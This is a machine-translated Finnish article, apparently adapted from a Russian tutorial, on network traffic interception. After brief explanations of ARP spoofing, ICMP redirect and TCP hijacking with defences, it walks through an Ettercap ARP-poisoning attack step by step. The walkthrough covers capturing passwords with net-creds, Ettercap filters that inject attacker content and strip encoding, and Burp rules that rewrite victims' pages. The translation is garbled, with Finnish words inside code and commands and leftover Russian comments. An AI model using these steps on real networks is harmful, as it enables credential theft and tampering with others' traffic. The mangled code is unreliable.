Hakkerit käyttävät liikenteen ohjaamiseen. Hakkerihyökkäysten tavat. Tietojen huijaus Burpin avulla

Menetelmät verkkoliikenteen sieppaamiseen

Verkon kuunteleminen verkkoanalysaattoriohjelmilla on ensimmäinen, eniten yksinkertaisella tavalla tietojen sieppaus.

Suojaa verkon salakuuntelulta, hae erityisiä ohjelmia, esimerkiksi AntiSniff, jotka pystyvät havaitsemaan verkossa olevat tietokoneet, jotka kuuntelevat verkkoliikennettä.

Ongelmansa ratkaisemiseksi nuuskimisen estoohjelmat käyttävät erityistä merkkiä kuuntelulaitteiden läsnäolosta verkossa - nuuskijatietokoneen verkkokortin on oltava erityisessä kuuntelutilassa. Kuuntelutilassa verkotetut tietokoneet vastaavat erityisellä tavalla testattavalle isännälle lähetettyihin IP-datagrammiin. Esimerkiksi kuunteluisännät käsittelevät yleensä kaiken saapuvan liikenteen, eivät vain isäntäosoitteeseen lähetettyjä datagrammeja. AntiSniff voi tunnistaa muitakin merkkejä epäilyttävästä isäntäkäyttäytymisestä.

Kuunteleminen on epäilemättä erittäin hyödyllistä hyökkääjän näkökulmasta, koska sen avulla voit saada paljon hyödyllistä tietoa - verkon kautta lähetettyjä salasanoja, verkkotietokoneiden osoitteita, luottamuksellisia tietoja, kirjeitä ja niin edelleen. Yksinkertainen salakuuntelu kuitenkin estää hakkeria häiritsemästä verkkoviestintää kahden isännän välillä muuttaakseen ja korruptoidakseen tietoja. Tämän ongelman ratkaisemiseksi tarvitaan kehittyneempää tekniikkaa.

Kaapatakseen ja kiertääkseen kahden isännän A ja B välisen verkkoviestintäprosessin, hyökkääjä voi korvata vuorovaikutuksessa olevien isäntien IP-osoitteet omilla IP-osoitteillaan lähettämällä väärennettyjä ARP (Address Resolution Protocol) -viestejä isäntäkoneille A ja B. .

Riisi. 1 väärennetty ARP-pyyntö

Katsotaanpa, kuinka hakkeri voi käyttää ARP-protokollaa siepatakseen verkkoviestinnän isäntien A ja B välillä.

Kaapatakseen verkkoliikenteen isäntien A ja B välillä hakkeri pakottaa IP-osoitteensa näille koneille, jotta A ja B käyttävät tätä väärennettyä IP-osoitetta viestien vaihdossa. Määrittääkseen IP-osoitteensa hakkeri suorittaa seuraavat toiminnot.

• Hyökkääjä määrittää isäntien A ja B MAC-osoitteet esimerkiksi W2RK-paketin nbtstat-komennolla.
• Hyökkääjä lähettää viestejä isäntien A ja B tunnistettuihin MAC-osoitteisiin, jotka ovat väärennettyjä ARP-vastauksia pyyntöihin ratkaista isäntien IP-osoitteet tietokoneiden MAC-osoitteiksi. Isännälle A kerrotaan, että isäntä B:n IP-osoite vastaa hyökkääjän tietokoneen MAC-osoitetta; isännälle B kerrotaan, että isäntä A IP-osoite vastaa myös hyökkääjän tietokoneen MAC-osoitetta.
• Isännät A ja B syöttävät vastaanotetut MAC-osoitteet ARP-välimuistiinsa ja käyttävät niitä viestien lähettämiseen toisilleen. Koska IP-osoitteet A ja B vastaavat hyökkääjän tietokoneen MAC-osoitetta, isännät A ja B, tietämättään mistään, kommunikoivat välittäjän kautta, joka pystyy tekemään mitä tahansa viesteillään.

Suojautuakseen tällaisilta hyökkäyksiltä verkonvalvojien on ylläpidettävä tietokantaa, jossa on kartoitustaulukko verkkotietokoneidensa MAC- ja IP-osoitteiden välillä.

UNIX-verkoissa tällainen huijaus ARP-hyökkäys voidaan toteuttaa järjestelmän verkkoliikenteen valvonta- ja ohjausapuohjelmilla, kuten arpredirectillä. Valitettavasti tällaisia ​​luotettavia apuohjelmia ei näytä olevan toteutettu Windows-verkoissa. Esimerkiksi NTsecurity-sivustolta voit ladata GrabitAII-apuohjelman, joka esitetään työkaluna liikenteen ohjaamiseen verkkoisäntien välillä. GrabitAII-apuohjelman perustesti osoittaa kuitenkin, että se on vielä kaukana täydellisestä onnistumisesta toimintojensa toteuttamisessa.

Kaapatakseen verkkoliikenteen hyökkääjä voi korvata verkkoreitittimen todellisen IP-osoitteen omalla IP-osoitteellaan esimerkiksi käyttämällä väärennettyjä ICMP-uudelleenohjausviestejä. RFC-1122:n mukaan isäntä A:n tulisi tulkita vastaanotettu uudelleenohjaussanoma vastauksena toiselle isännälle lähetettyyn datagrammiin, esimerkiksi B. Isäntä A määrittää toimintansa uudelleenohjaussanoman suhteen vastaanotetun uudelleenohjaussanoman sisällön perusteella, ja jos Uudelleenohjaus on asetettu uudelleenohjaamaan datagrammit paikasta A paikkaan B uudella reitillä, isäntä A tekee juuri sen.

Riisi. 2 Väärä reititys

Huijausreitityksen suorittamiseksi hyökkääjän on tiedettävä joitain organisaation yksityiskohtia paikallinen verkko, jossa isäntä A sijaitsee, erityisesti sen reitittimen IP-osoite, jonka kautta liikenne lähetetään isännältä A:lle B. Tämän tietäen hyökkääjä muodostaa IP-datagrammin, jossa lähde-IP-osoite määritellään palvelimen IP-osoitteeksi. reititin ja vastaanottaja on määritetty isäntä A. Datagrammiin sisältyy myös ICMP-uudelleenohjaussanoma, jossa uuden reitittimen osoitekenttään on asetettu hyökkääjän tietokoneen IP-osoite. Vastaanotettuaan tällaisen viestin isäntä A lähettää kaikki viestit hyökkääjän tietokoneen IP-osoitteeseen.

Suojautuaksesi tällaisilta hyökkäyksiltä, ​​sinun tulee poistaa käytöstä (esimerkiksi palomuurilla) isännässä A ICMP-uudelleenohjausviestien käsittely, ja tracert-komento (Unixissa tämä on tracerout-komento) voi paljastaa hyökkääjän tietokoneen IP-osoitteen. . Nämä apuohjelmat voivat löytää lisäreitin, joka ilmestyi paikallisessa verkossa, jota ei ole määrätty asennuksen aikana, jos verkonvalvoja tietysti on valppaana.

Yllä olevat esimerkit sieppauksista (jotka eivät suinkaan rajoitu hyökkääjiin) vakuuttavat tarpeesta suojata verkon kautta lähetettyä tietoa, jos tiedot sisältävät luottamuksellisia tietoja. Ainoa tapa suojautua verkkoliikenteen sieppauksilta on sellaisten ohjelmien käyttö, jotka toteuttavat salausalgoritmeja ja salausprotokollia ja estävät salaisten tietojen paljastamisen ja korvaamisen. Tällaisten ongelmien ratkaisemiseksi kryptografia tarjoaa keinot suojattujen protokollien kautta lähetettyjen viestien salaamiseen, allekirjoittamiseen ja todentamiseen.

Kaikkien salausmenetelmien käytännön toteutuksen tiedonvaihdon suojaamiseksi tarjoaa VPN-verkot(Virtual Private Network - Virtual Private Networks).

TCP-yhteyden sieppaus

Kehittynein verkkoliikenteen sieppaushyökkäys on katsottava TCP-yhteyden kaappaamiseksi (TCP-kaappaus), kun hakkeri luomalla ja lähettämällä TCP-paketteja hyökkäyksen kohteena olevalle isännälle keskeyttää nykyisen viestintäistunnon isännän kanssa. Edelleen, käyttämällä TCP-protokollan ominaisuuksia keskeytyneen TCP-yhteyden palauttamiseen, hakkeri sieppaa keskeytetyn viestintäistunnon ja jatkaa sitä katkenneen asiakkaan sijaan.

TCP-kaappaushyökkäysten suorittamiseen on luotu useita tehokkaita apuohjelmia, mutta ne kaikki on toteutettu Unix-alustalle, ja nämä apuohjelmat ovat saatavilla Web-sivustoilla vain lähdekoodimuodossa. Siten TCP-yhteyden sieppaamisen hyökkäyksille ei ole paljon hyötyä.

TCP (Transmission Control Protocol) on yksi peruskuljetusprotokollasta. OSI-kerros, jonka avulla voit muodostaa loogisia yhteyksiä virtuaalisen viestintäkanavan kautta. Tämän kanavan kautta lähetetään ja vastaanotetaan paketteja niiden järjestyksen rekisteröinnillä, pakettivirtaa ohjataan, vääristyneiden pakettien uudelleenlähetys järjestetään ja istunnon lopussa viestintäkanava katkeaa. TCP on ainoa protokolla perusprotokolla TCP / IP-perheestä, jossa on edistynyt viesti- ja yhteydentunnistusjärjestelmä.

Ohjelmistopakettien haistajien yleiskatsaus

Kaikki ohjelmiston nuuskijat voidaan karkeasti jakaa kahteen luokkaan: nuuskimiin, jotka tukevat käynnistämistä komentorivi, ja haistaa graafisella käyttöliittymällä. Samanaikaisesti huomaamme, että on haistajia, jotka yhdistävät molemmat nämä ominaisuudet. Lisäksi snifferit eroavat toisistaan ​​tukemiensa protokollien, siepattujen pakettien analyysin syvyyden, suodattimien konfigurointikyvyn ja yhteensopivuuden muiden ohjelmien kanssa.

Yleensä ikkuna tahansa nuuskija kanssa GUI koostuu kolmesta alueesta. Ensimmäinen näyttää yhteenvedon siepatuista paketeista. Tyypillisesti tällä alueella on vähimmäismäärä kenttiä, nimittäin: paketin sieppausaika; paketin lähettäjän ja vastaanottajan IP-osoitteet; Pakettilähde- ja kohde-MAC-osoitteet, lähde- ja kohdeporttiosoitteet; protokollatyyppi (verkko-, siirto- tai sovelluskerros); joitain yhteenvetotietoja siepatuista tiedoista. Toinen alue näyttää tilastotietoja yksittäisestä valitusta paketista, ja lopuksi kolmas alue esittää paketin heksadesimaali- tai merkkimuodossa - ASCII.

Lähes kaikki pakettihauskijat mahdollistavat dekoodattujen pakettien analysoinnin (siksi pakettihauskimia kutsutaan myös pakettianalysaattoreiksi tai protokolla-analysaattoreiksi). Sniffer jakaa siepatut paketit kerroksittain ja protokollien mukaan. Jotkut pakettianalysaattorit pystyvät tunnistamaan protokollan ja näyttämään siepatut tiedot. Tämän tyyppiset tiedot näytetään yleensä haistaja-ikkunan toisella alueella. Esimerkiksi mikä tahansa haistaja pystyy tunnistamaan TCP-protokollan, ja edistyneet nuuskijat voivat määrittää, mikä sovellus loi tämän liikenteen. Useimmat protokolla-analysaattorit tunnistavat yli 500 erilaista protokollaa ja voivat kuvata ja purkaa niitä nimellä. Mitä enemmän tietoa haistaja pystyy purkamaan ja näyttämään näytöllä, sitä vähemmän sinun on purettava manuaalisesti.

Yksi ongelma, johon pakettihaistelijat voivat törmätä, on se, että protokollaa ei pystytä tunnistamaan oikein käyttämällä muuta porttia kuin oletusporttia. Esimerkiksi turvallisuuden parantamiseksi jotkin tunnetut sovellukset voidaan määrittää käyttämään muita portteja kuin oletusportteja. Joten perinteisen verkkopalvelimelle varatun portin 80 sijaan, annettu palvelin voidaan pakottaa määrittämään uudelleen portissa 8088 tai missä tahansa muussa. Jotkut pakettianalysaattorit eivät tässä tilanteessa pysty määrittämään protokollaa oikein ja näyttämään vain tietoja alemman tason protokollasta (TCP tai UDP).

On olemassa ohjelmiston haistajia, joissa on ohjelmiston analyyttisiä moduuleja laajennuksina tai sisäänrakennetuina moduuleina, joiden avulla voit luoda raportteja hyödyllisillä analyyttisillä tiedoilla siepatusta liikenteestä.

Toinen useimpien ohjelmistopakettien haistajien ominaisuus on kyky määrittää suodattimia ennen liikenteen sieppaamista ja sen jälkeen. Suodattimet erottavat tietyt paketit yleisestä liikenteestä tietyn kriteerin mukaan, jolloin pääset eroon tarpeettomasta tiedosta liikennettä analysoitaessa.

Ettercap vaihtoehdot

Ettercap on suosituin man-in-the-middle -hyökkäysohjelma, mutta onko se paras? Koko käsikirjasta näet, että Ettercapia ei käytetä lähes koskaan yksinään, että yksi tai toinen ohjelma on aina linjassa sen kanssa liikenteen käsittelyketjussa. Ehkä tämä lisää joustavuutta, yleensä tämä lähestymistapa on UNIXin ytimessä - yksi ohjelma suorittaa yhden tehtävän ja loppukäyttäjä yhdistää eri ohjelmia halutun tuloksen saavuttamiseksi. Tällä lähestymistavalla ohjelmakoodia on helpompi ylläpitää; tällaisia ​​​​pieniä "palikoita" voidaan käyttää minkä tahansa monimutkaisen ja joustavan järjestelmän rakentamiseen. Siitä huolimatta, että viidellä avoimella konsolilla on erilaisia ​​tehtäviä, joiden työskentely ohjelmien tarkoituksena on saavuttaa yksi tulos, ei ole kovin kätevää, se on vain vaikeampaa, jossain vaiheessa on mahdollisuus tehdä virhe, ja koko konfiguroitu järjestelmä käy tyhjäkäynnillä.

Net-Creds haistaa:

• Vieraillut URL-osoitteet
• lähetti POST-pyyntöjä
• kirjautumistunnukset/salasanat HTTP-lomakkeista
• kirjautumistunnukset/salasanat HTTP-perustodennusta varten
• HTTP-haut
• FTP-kirjautumistunnukset/salasanat
• IRC-tunnukset/salasanat
• POP-kirjautumistunnukset/salasanat
• IMAP-kirjautumistunnukset/salasanat
• Telnet-kirjautumistunnukset/salasanat
• SMTP-kirjautumistunnukset/salasanat
• SNMP-yhteisömerkkijono
• kaikki tuetut NTLMv1/v2-protokollat, kuten HTTP, SMB, LDAP jne.
• Kerberos

Hyvä valikoima siepattuja kuvia, ja ajoverkko on tässä suhteessa yksinkertaisempi - se näyttää vain siepatut kuvat.

Vaihda laitteesi edelleenlähetystilaan.

echo "1" > /proc/sys/net/ipv4/ip_forward

Aloitamme Ettercapin graafisella käyttöliittymällä ( -G):

Ettercap-G

Valitse nyt isännät, siinä on alakohta Etsi isäntiä. Kun skannaus on valmis, valitse isäntäluettelo:

Kuten Tavoitteet1 valitse reititin ( Lisää kohteeseen 1), kuten Tavoitteet2 valitse laite, johon haluat hyökätä ( Lisää kohteeseen 2).

Mutta tässä voi syntyä ensimmäinen koukku, varsinkin jos isäntiä on paljon. Erilaisissa ohjeissa, kuten yllä esitetyssä videossa, kirjoittajat kiipeävät kohdekoneeseen (jostain syystä kaikilla on siellä Windows) ja komennon avulla katsovat tämän koneen IP:tä paikallisessa verkossa. Hyväksy, tätä vaihtoehtoa ei voida hyväksyä todellisissa olosuhteissa.

Jos skannaat -sovelluksella, voit saada niitä Lisäinformaatio isännistä, tarkemmin verkkokortin valmistajasta:

nmap -sn 192.168.1.0/24

Jos tiedot eivät vieläkään riitä, voit tehdä skannauksen käyttöjärjestelmän määritelmällä:

nmap -O 192.168.1.0/24

Kuten näet, kone, jolla on IP 192.168.1.33, osoittautui Windowsiksi, jos tämä ei ole merkki ylhäältä, niin mikä se on? 😉 lol

Sen lisäämme toiseksi maaliksi.

Siirrytään nyt valikkokohtaan. Mitm. Siellä valitaan ARP-myrkytys… Valitse ruutu Haista etäyhteydet.

Aloitamme sadonkorjuun, käynnistämme yhdessä ikkunassa

Nettomäärärahat

toisessa (molemmat ohjelmat voidaan ajaa ilman valintoja)

ajoverkko

Tiedonkeruu aloitettiin välittömästi.

Oikealla puolella driftnet on avannut toisen ikkunan, joka näyttää otetut kuvat. Net-creds-ikkunassa näemme vierailtuja sivustoja ja siepattuja salasanoja:

1.2 Ettercap + Burp Suite

3. Tarkastele tietoja (vieraillut verkkosivustot ja kaapatut salasanat) Ettercapissa

valikossa näkymä meillä on välilehtiä käytettävissä Liitännät Ja profiilit. Voit myös valita ruudun Ratkaise IP-osoitteet(käännä IP-osoitteet). Yhteydet ovat tietysti yhteyksiä. Ettercap kerää muistissa olevat profiilit jokaisesta löytämästään isännästä. Sinne kerätään käyttäjät ja salasanat. Tässä tapauksessa profiilit, joissa on tallennettu tilitiedot (salasanat), on merkitty ristillä:

Älä luota liikaa profiileihin - esimerkiksi siepatut kirjautumistunnukset ja salasanat FTP:lle ja muille palveluille on merkitty, joille ohjelma voi yksiselitteisesti tulkita saamansa tiedot valtuuksiksi. Tämä ei sisällä esimerkiksi perustunnistustietoja, verkkolomakkeisiin syötettyjä tunnuksia ja salasanoja.

Yhteydissä lupaavimmat tiedot on merkitty tähdellä:

Voit tarkastella tietoja kaksoisnapsauttamalla näitä merkintöjä:

Jotta et etsi näitä tähtiä koko luettelosta, voit lajitella tämän kentän mukaan ja ne ovat kaikki ylä- tai alaosassa:

Perustodennus saatu:

Yandexin kirjautumissalasana (korostettu alla):

Nämä ovat siepatut Vkontakten tunnistetiedot:

Myös mielenkiintoisimmat tiedot kerätään alakonsoliin:

Jos haluat tallentaa ohjelman tulokset, käytä näitä vaihtoehtoja (täsmennä avaimet Ettercapin käynnistyksen yhteydessä:

Kirjausvaihtoehdot: -w, --write<файл>kirjoittaa kaapatut tiedot pcapfileen<файл>-L, --log<логфайл>kirjoita kaikki liikenne tähän<логфайл>-l, --lokitiedot<логфайл>Kirjoita tähän vain passiivista tietoa<логфайл>-m, --log-msg<логфайл>kirjoita kaikki viestit tähän<логфайл>-c, --compress käyttää gzip-pakkausta lokitiedostoille

4. Tietojen korvaaminen lennossa Ettercapissa

4.1 Mukautettujen Ettercap-suodattimien käyttäminen

Huomaa: Kaikissa testeissäni Ettercap-suodattimet eivät toimineet. On vaikea ymmärtää, onko se käsissä, laitteiston ominaisuuksissa vai itse ohjelmassa... Mutta versiosta 0.8.2 (uusin tällä hetkellä) on bugiraportti suodattimien ongelmista. Yleensä virheraporttien ja foorumien perusteella suodattimet joko putoavat usein tai eivät toimi ollenkaan pitkään aikaan. Siellä on haara, jota on muokattu 5 kuukautta sitten https://github.com/Ettercap/ettercap/tree/filter-improvements, eli suodattimen parannukset (suodatinparannuksilla). Tälle haaralle ja arkiston versiolle tehtiin monenlaisia ​​testejä, erilaisia ​​suodattimia testattiin eri olosuhteissa, kului paljon aikaa, mutta tulosta ei tullut. Muuten, asentaaksesi suodatinparannusten version Kali Linuxiin, sinun on tehtävä tämä:

sudo apt-get poista ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev-dev-dev libncur libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build_DOCS_ DOCS_ cmP build cABLE =Päällä ../ make sudo make install

Yleensä, jos suodattimesi eivät toimi, et ole yksin. Ettercapin ohjeissa en voi ohittaa suodattimien aihetta, joten ne huomioidaan joka tapauksessa.

Toistaiseksi olemme käyttäneet Ettercapia ARP-huijaukseen. Tämä on erittäin pinnallinen sovellus. Mukautettujen suodattimien ansiosta voimme puuttua asiaan ja muuttaa liikennettä lennossa. Suodattimet on sisällytettävä erillisiin tiedostoihin ja ne on käännettävä Etterfilter-ohjelmalla ennen käyttöä. Vaikka dokumentaatio, johon linkki annetaan, näyttää olevan lyhyt, mutta yhdessä alla olevien esimerkkien kanssa voit kirjoittaa varsin mielenkiintoisia suodattimia.

Luodaan ensimmäinen suodatin, se korvaa kaikki kuvat tällä:

Tiedostossa, jonka nimi on img_replacer.filter copy:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( korvaa("Accept-Encoding", "Accept-Rubbish!"); # huomautus: korvaava merkkijono on samanpituinen kuin alkuperäinen msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( korvaa("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); korvaa("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); korvaa("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); korvaa("SRC=", "src=" \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Suodattimen aika.\n"); )

Kokoa tiedosto:

Etterfilter img_replacer.filter -o img_replacer.ef

Kokoonpanon tulokset:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 protokollataulukkoa ladattu: DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 vakiota ladattu: VRRP OSPF GRE UDP lähdetiedosto TCP PPPOMP ICPP lähde "img_replacer.filter" tehty. Metapuun avaaminen valmis. Tarrojen muuntaminen todellisiksi offsetiksi tehty. Tulosteen kirjoittaminen tiedostoon "img_replacer.ef" valmis. -> 18 ohjeeseen koodattu komentosarja.

Avain -F käskee ohjelmaa lataamaan suodattimen avainta seuraavasta tiedostosta. Kääntämisen jälkeen uuden tiedostomme nimi suodattimella on img_replacer.ef, joten komennosta tulee:

Ettercap -G -F img_replacer.ef

Huomautus V: Kun seuraat verkkoliikennettä, näkemäsi paketit voivat olla koodatussa muodossa. varten tehokasta työtä suodattimia, Ettercap tarvitsee liikennettä muodossa tavallista tekstiä. Joidenkin havaintojen mukaan verkkosivujen käyttämä koodaustyyppi on "Accept-Encoding: gzip, deflate"

Alla on suodatin, joka korvaa koodauksen ja pakottaa viestinnän pelkkänä tekstinä:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( korvaa("gzip", " "); # huomautus: neljä välilyöntiä viestin merkkijonossa korvaa ("valkoinen gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( korvaa("deflate", " "); # huomautus: seitsemän välilyöntiä korvaavassa merkkijonossa msg("valkoinen deflate\n"); ) )

Suodattimien kirjoittamisen syntaksi kuvataan yksityiskohtaisesti ja sitten muutama esimerkki lisää:

# korvaa teksti paketissa: if (ip.proto == TCP && search(DATA.data, "lol"))( korvaa("lol", "smh"); msg("suodatin suoritettiin"); ) # näytä viesti if tcp-portti on 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH-paketti\n"); ) ) # kirjaa kaikki telnet-liikenne , suorita myös ./program pakettia kohden if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log ") ; exec("./program"); ​​​​) ) # kirjaa kaikki liikenne lokiin paitsi http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log(DATA.data , "./logfile.log"); ) # joitakin pakettien hyötykuormatoimintoja if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = "muokattu"; DATA .data + 20 = 0x4445; ) # pudota kaikki paketit, jotka sisältävät "ettercap" if (search(DECODED.data, "ettercap")) ( msg("joku puhuu meistä...\n"); drop( ); kill( ); ) # kirjoittaa säännöllistä lauseketta vastaavia salattuja ssh-paketteja if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # tappavia paketteja if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Tietojen huijaus Burpin avulla

Käynnistämme Ettercapin ja Burpin kappaleessa 1.2 tai kappaleessa 2.2 kuvatulla tavalla.

Burpissa mene osoitteeseen Välityspalvelin -> Asetukset. Löydämme sieltä Yhdistä ja korvaa. Klikkaus Lisätä lisätäksesi uuden säännön.

• Pyynnön otsikko on pyynnön otsikko
• pyynnön elin- pyynnön elin
• vastauksen otsikko- vastauksen otsikko
• vastausrunko- vastausrunko
• Pyydä parametrin nimeä- Kyselyparametrin nimi
• Pyydä parametriarvoa- Pyydä parametrin arvoa
• Pyydä ensimmäinen rivi- Kyselyn ensimmäinen rivi

Jos sinun on muutettava GET-menetelmällä lähetettyä dataa, tämä koskee otsikoita.

HTML-merkinnöissä on myös sellainen asia kuin head (head tag). Edellä mainituilla ei ole mitään tekemistä tämän otsikon kanssa. Hieman korkeampi sanotaan pakettien otsikoista. Jos haluat muuttaa sisältöä HTML-sivut, sinun tulee aina valita Response body pyynnön otsikon sijaan, vaikka aiot muuttaa head-tunnisteen sisältöä (esimerkiksi otsikkoa).

Jos et ole perehtynyt säännöllisiä lausekkeita, niin periaatteessa se ei haittaa: HTML antaa paljon anteeksi, ja mitä se ei ymmärrä, se yksinkertaisesti jättää huomiotta - voit käyttää sitä. Jos osaat käyttää säännöllisiä lausekkeita, kunnioitan sinua.)))

Luodaan esimerkiksi uusi sääntö, muutetaan Request-otsikko vastaukseksi. Itse säännössä muutumme

Valitse ruutu Regex-ottelu.

Nyt kaikilla sivustoilla (ilman HTTPS:ää) otsikon sijasta ei ole otsikkoa:

Lisää mielivaltainen rivi body-tunnisteen jälkeen (se on tekstin ensimmäinen rivi). Pyynnön otsikko muutetaan vastauksen tekstiksi. Muutamme

Valitse ruutu Regex-ottelu.

Oikeassa yläkulmassa (asettelusta riippuen) näkyy teksti "I am cool!". Voit lisätä CSS-, JavaScript-koodin, mitä tahansa tekstiä - mitä tahansa. Voit yleensä poistaa sivulta kaiken ja täyttää sen sitten omalla sisällölläsi - kaikki riippuu mielikuvituksestasi.

Kutakin lomaketta ajateltiin hieman muokata niin, että tiedot lähetetään alkuperäiselle palvelimelle ja hyökkääjän palvelimelle (toteuta kullekin lomakkeelle monilähetys). Mutta kun olemme päättäneet, että jos lähetettyä dataa ei ole salattu ja meillä on pääsy siihen, niin näemme sen joka tapauksessa, meidän ei tarvitse lähettää sitä millekään palvelimelle. Kuitenkin, jos joku sitä tarvitsee, todella toimiva esimerkki tietojen lähettämisestä yhdestä lomakkeesta useille palvelimille kerralla.

5. Naudanlihan liitos

Aloittaaksesi BeEF-ominaisuuksien käytön, meidän on upotettava JavaScript-tiedosto HTML-koodiin, yleensä rivi, kuten: